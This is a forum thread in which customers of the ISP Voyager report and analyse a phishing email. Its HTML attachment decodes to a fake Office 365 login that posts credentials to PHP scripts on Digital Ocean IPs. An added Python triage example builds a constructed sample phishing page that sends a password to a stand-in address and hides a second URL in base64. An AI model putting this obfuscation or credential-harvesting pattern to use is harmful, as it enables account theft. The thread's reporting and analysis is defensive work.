amanzi

#295894 2-May-2022 22:53
I received my monthly invoice from Voyager today (this was a legitimate email) and then a few hours later I received another invoice from Voyager which looked like a genuine email with my correct name, but an incorrect account number and the monthly fee was too high. The invoice attachment with the email was an HTML file, so I downloaded it, opened in VS Code, and found a bunch of encoded HTML inside a JavaScript script tag. After decoding the HTML, I could clearly see the scam contents which appeared to present an Office 365 logon screen but POSTs the credentials to a PHP script hosted on a Digital Ocean IP address. The logon screen looks and feels like a genuine Office 365 logon prompt, pasted below for your reference.

Thought I'd report it here in case other Voyager customers see this and get tricked into trying to open the attachment. Here's a copy of the scam email, I've blanked out the account number because I assume it's a real account number that belongs to another customer. If you're a Voyager customer, you'll recognise this email instantly - looks pretty legit. This is one of the most convincing email scams I've received, and it wasn't picked up by any of the M365 email protections. In fact, on further digging I can see that the SPF checks in the email headers all passed because the email was sent by another M365 customer, whose email must have been hacked.

The logon screen that's presented - this appears after the animation you see when opening Outlook.


danfaulknor
Prodigi

#2909528 2-May-2022 23:40
Quite well done, unfortunately.

It's up on their status page too - https://status.voyager.nz/

richms
#2909529 2-May-2022 23:44
Aww I missed out on this one. Perhaps they skipped over Gmail addresses since that would be weird to get Microsoft login fakes.

Richard

amanzi

#2909530 2-May-2022 23:46
danfaulknor:

It's up on their status page too - https://status.voyager.nz/

Thanks for pointing that out. I reported it to them around 10pm, so it looks like they had already received some reports by then.

amanzi

#2909532 2-May-2022 23:50
richms:

Aww I missed out on this one.

This has been a fun one to dig into. I've since found two other IP addresses embedded in the code, one of which was also Base64 encoded. All 3 IP addresses belong to Digital Ocean which I've reported to them, and all of them host some kind of PHP file which only responds to POST requests. This is actually a fairly sophisticated phishing attack and would be really easy to be fooled by.
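
The attachment described in this thread (encoded HTML inside a script tag, a login form that POSTs to a PHP script on a bare IP, and a further Base64-encoded address) can be triaged without ever rendering it in a browser. The Python below is an added example, not code from the thread or from any poster: the attachment it parses is a constructed stand-in using documentation-range addresses, and the unescape()/atob() layering it peels is an assumption about how such kits are packed, not a description of the real file.

```python
import base64, re
from urllib.parse import unquote

# Constructed sample (not the real attachment): the login page is URL-encoded inside a
# <script> and written out with unescape(); a nested script hides a second URL behind atob().
_HIDDEN_URL = base64.b64encode(b"http://203.0.113.22/p.php").decode()
_INNER_PAGE = ('<form method="POST" action="http://203.0.113.10/login.php">'
               '<input name="password"></form>'
               '<script>var u=atob("%s");</script>' % _HIDDEN_URL)
SAMPLE_ATTACHMENT = ('<html><body><script>document.write(unescape("%s"))</script></body></html>'
                     % "".join("%%%02X" % b for b in _INNER_PAGE.encode()))

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)
ACTION_RE = re.compile(r'action\s*=\s*["\']([^"\']+)', re.I)
URL_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?(?:/[\w./\-?=&%]*)?", re.I)
IP_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def decode_layers(html, max_depth=5):
    """Recover fragments from script blocks by peeling URL encoding and base64, layer by layer."""
    fragments, pending = [], [html]
    for _ in range(max_depth):
        found = []
        for text in pending:
            for body in SCRIPT_RE.findall(text):
                if "%" in body and unquote(body) != body:   # unescape()-style payload
                    found.append(unquote(body))
                for blob in B64_RE.findall(body):           # atob()-style payload
                    try:
                        decoded = base64.b64decode(blob, validate=True).decode("utf-8")
                    except ValueError:  # binascii.Error and UnicodeDecodeError both subclass it
                        continue
                    if decoded.isprintable(): found.append(decoded)
        found = [f for f in found if f not in fragments]
        if not found:
            break
        fragments.extend(found)
        pending = found   # scan what this layer revealed for yet another layer
    return fragments

def extract_indicators(html):
    """Where harvested credentials would be sent: form actions, URLs and bare IP hosts."""
    text = "\n".join(decode_layers(html))
    return {
        "form_actions": sorted(set(ACTION_RE.findall(text))),
        "urls": sorted(set(URL_RE.findall(text))),
        "hosts": sorted(set(IP_RE.findall(text))),
    }
```

The hosts it reports are what you would pass to the hosting provider's abuse contact and block at the mail gateway, as the poster did with the Digital Ocean addresses.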

xpd
Trash bandit
#2909551 3-May-2022 08:14
We've had this hit work as well... and we have nothing held by Vocus/Voyager etc.

Gavin / xpd / FastRaccoon

01EG
#2909677 3-May-2022 15:13
amanzi:

I received my monthly invoice from Voyager today.....

And what is the "from" email?

Original one comes from "billing@voyager.nz", hard to miss.

amanzi

#2909691 3-May-2022 15:45
01EG:

amanzi:

I received my monthly invoice from Voyager today.....

And what is the "from" email?

Original one comes from "billing@voyager.nz", hard to miss.

From address was spoofed too: "From: Voyager Accounts <billing@voyager.nz>"